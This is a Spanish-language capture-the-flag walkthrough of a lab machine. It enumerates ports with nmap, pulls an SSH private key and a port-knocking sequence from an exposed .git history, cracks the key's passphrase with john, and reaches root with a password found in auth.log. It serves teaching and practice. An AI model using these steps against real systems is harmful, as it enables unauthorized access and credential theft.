Enumeramos puertos:
❯ nmap -sCV -p 80 -oN 02-targeted.txt 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 19:50 -03
Nmap scan report for 192.168.1.53
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
| http-git:
| 192.168.1.53:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Commit #5
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.35 secondsHay un repositorio Git expuesto. Lo descargamos y revisamos el historial de commits con show, donde encontramos una clave SSH privada y, lo más interesante, la configuración de port knocking (la secuencia que abre el puerto 22):
git log | grep commit | cut -d ' ' -f2 | xargs git show
Author: charlie <charlie@hit.nyx>
-----BEGIN OPENSSH PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
...
-----END OPENSSH PRIVATE KEY-----
-[options]
- UseSyslog
-
-[openSSH]
- sequence = 65535,8888,54111
- seq_timeout = 1
- command = /usr/sbin/service ssh start
- sequence = 7000,8000,9000
- seq_timeout = 5
- command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
- tcpflags = syn
-
-[closeSSH]
- sequence = 9000,8000,7000
- seq_timeout = 5
- command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
- tcpflags = syn
-
-[openHTTPS]
- sequence = 12345,54321,24680,13579
- seq_timeout = 5
- command = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
- tcpflags = synRealizamos el knock en la secuencia indicada para abrir el puerto 22:
❯ knock -v 192.168.1.53 65535 8888 54111
hitting tcp 192.168.1.53:65535
hitting tcp 192.168.1.53:8888
hitting tcp 192.168.1.53:54111
❯ nmap -sCV -p 22 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 20:37 -03
Nmap scan report for 192.168.1.53
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 secondsCrackeamos la passphrase de la clave con john y nos conectamos como charlie:
❯ ssh2john.py id_rsa > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
charlie1 (id_rsa)
...
❯ ssh charlie@192.168.1.53 -i id_rsa
Enter passphrase for key 'id_rsa': charlie1
charlie@hit:~$Para escalar privilegios, revisamos nuestros grupos:
charlie@hit:/$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)Pertenecemos al grupo adm (Privileged Groups Privesc), que permite leer los logs del sistema. Buscamos credenciales filtradas en auth.log y encontramos una contraseña que se introdujo por error como nombre de usuario en un intento de login:
charlie@hit:/var/log$ cat auth.log | grep pass
...
2025-02-03T09:50:56.693974+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
...Usamos esa contraseña para autenticarnos como root:
charlie@hit:/var/log$ su root
Contraseña: r00tP4zzw0rd
root@hit:/var/log#Obtenemos la flag y fin.